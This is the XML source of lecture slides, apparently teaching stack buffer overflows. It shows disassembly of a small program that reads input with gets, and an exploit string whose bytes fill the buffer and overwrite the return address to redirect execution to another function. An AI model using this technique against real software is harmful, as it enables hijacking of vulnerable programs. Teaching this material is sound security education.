                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{047C66DA-2A5D-AD4D-AAB6-82857D6DAE9F}"/>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6" name="Rectangle 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6371FBC2-7315-9F4E-9789-E0269AFBE07B}"/>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11" name="Group 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45957D08-54C6-C448-BEF2-D9B174469CF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="3586038"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7465EA4D-75F1-2149-84A4-2B1FCC0DFC50}"/>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2" name="Rectangle 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D150C261-6B51-1648-A98B-188168F54535}"/>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3" name="Rectangle 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51044446-1BDF-4A49-A4DE-B7EB2E8353BA}"/>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4" name="Rectangle 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A346EC-6170-8745-85E2-E2462E2941F9}"/>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5" name="Rectangle 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5B3D28E-3EF6-A04D-A204-ECF0E616DA5E}"/>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6" name="Rectangle 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403BFC4A-66C6-7F48-86C6-7D9E64636E48}"/>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7" name="Rectangle 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2B16FC-A51F-3944-9ABA-25DBC987DA6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8" name="Rectangle 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AB27427-512D-FA43-883E-77FFE2FAAA2C}"/>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3" name="Group 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{512FFDB0-58EE-DD4F-86A3-4CD33CA374D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="1993802"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="Rectangle 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACE08695-51CD-6643-8C68-9B0819631FD3}"/>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 name="Rectangle 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{799D3734-7EFD-964D-8CC3-C53EEEFCA786}"/>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5" name="Rectangle 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F439E652-2793-2F45-AE03-38B4FEF7AD0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6" name="Rectangle 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A71B1FA9-1F08-0944-A94D-B6774665DED9}"/>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7" name="Rectangle 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{228EA9BA-ABCD-C44B-8AC9-61F17D39B51C}"/>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8" name="Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B06FD4DB-E888-CA4E-A0C3-CD248E09B1B5}"/>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9" name="Rectangle 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C91DF1-778A-FC4B-8522-0110D46D496D}"/>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0" name="Rectangle 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E0C1949-01DB-174F-8385-F7B051AE73CF}"/>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4" name="Group 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD1879DC-3E26-224B-AA12-83B4F7F56F34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="1197691"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Rectangle 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C543844-E7FF-E94F-B1E0-38CE3BC6F118}"/>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 name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{401F0810-BA53-DD44-A344-494D32CF75E3}"/>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 name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D78ABC4-A009-5A45-9F92-0CE31B51DD40}"/>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8" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B169265D-CFF6-5B43-B5AA-F6E63B8775D2}"/>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9" name="Rectangle 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E194E1CA-19F8-194F-AEF5-233FAEF6F9F6}"/>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20" name="Rectangle 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{584B9700-3D71-1845-8827-293503B9DC66}"/>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21" name="Rectangle 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458999EE-D500-644D-BB0E-BE5E8CC4F0C5}"/>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22" name="Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7674A509-82C9-DA42-A5E4-45BC0A5D6CCF}"/>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51" name="TextBox 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46B0881B-4B2A-0B4C-8C51-B8B567E4437B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10373010" y="579133"/>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8" name="Rounded Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1832ADEC-9076-9A4F-A428-929BCDA73010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19237" y="1237664"/>
            <a:ext cx="9566798" cy="56203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400612:       bf 5f 07 40 00          mov    $0x40075f,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400617:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40061c:       e8 bf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4004e0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf@plt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400621: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400626:       e8 c5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4004f0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets@plt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40062b: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400630:       e8 9b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400635:       48 83 c4 18             add    $0x18,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400639:       c3                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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000000000040063a &lt;caller&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063a: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08             sub    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063e:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400643:       e8 b7 ff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400648:       bf 30 07 40 00          mov    $0x400730,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40064d:       e8 7e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400652:       48 83 c4 08             add    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400656: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3" name="Oval 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D499533A-C996-944F-A024-D250C85CDB51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10137913" y="1007165"/>
            <a:ext cx="2239617" cy="13119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Elbow Connector 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66798E73-A718-C843-BEBE-FF015D6E008D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="3" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7574866" y="2596012"/>
            <a:ext cx="3959739" cy="3405974"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10003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783AD78A-3670-4F49-8F93-ABFC69D1C95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19238" y="1237665"/>
            <a:ext cx="9566798" cy="56203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00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000004005e7 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>not_caller</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4005e7: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08          	sub    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  4005eb:	bf 08 07 40 00       	mov    $0x400708,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  4005f0:	e8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>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4005f5:	bf 00 00 00 00       	mov    $0x0,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  4005fa:	e8 01 ff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400500 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;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400612:       bf 5f 07 40 00          mov    $0x40075f,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400617:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40061c:       e8 bf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4004e0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf@plt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400621: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400626:       e8 c5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4004f0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets@plt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40062b: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400630:       e8 9b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400635:       48 83 c4 18             add    $0x18,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400639: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53" name="Oval 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64249702-A402-5444-8429-B5EF695A2FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="189963" y="1877120"/>
            <a:ext cx="7661785" cy="5522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206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vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>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vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="12" presetID="14" presetClass="entr" presetSubtype="5"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randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>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up)">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1"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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="29" presetID="2" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="30" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="33" presetID="22" presetClass="exit" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="36" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="37" presetID="21"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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="39"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8" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="1" animBg="1"/>
      <p:bldP spid="3" grpId="0" animBg="1"/>
      <p:bldP spid="48" grpId="1"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Creating the Exploit String</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2CE0AEB-3D5D-2B4F-8930-6FC610ADD4FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="1821677"/>
            <a:ext cx="10782301" cy="10030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48 65 6C 6C 6F 2C 20 57   // fill the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6F 72 6C 64 21 0A 00 00   // fill the space between buffer and return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EB 05 40                  // new return address (byte reversed due to little-endian)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60572507-0675-2548-9F59-997557C6BAEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1501620"/>
            <a:ext cx="1720599" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>string.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
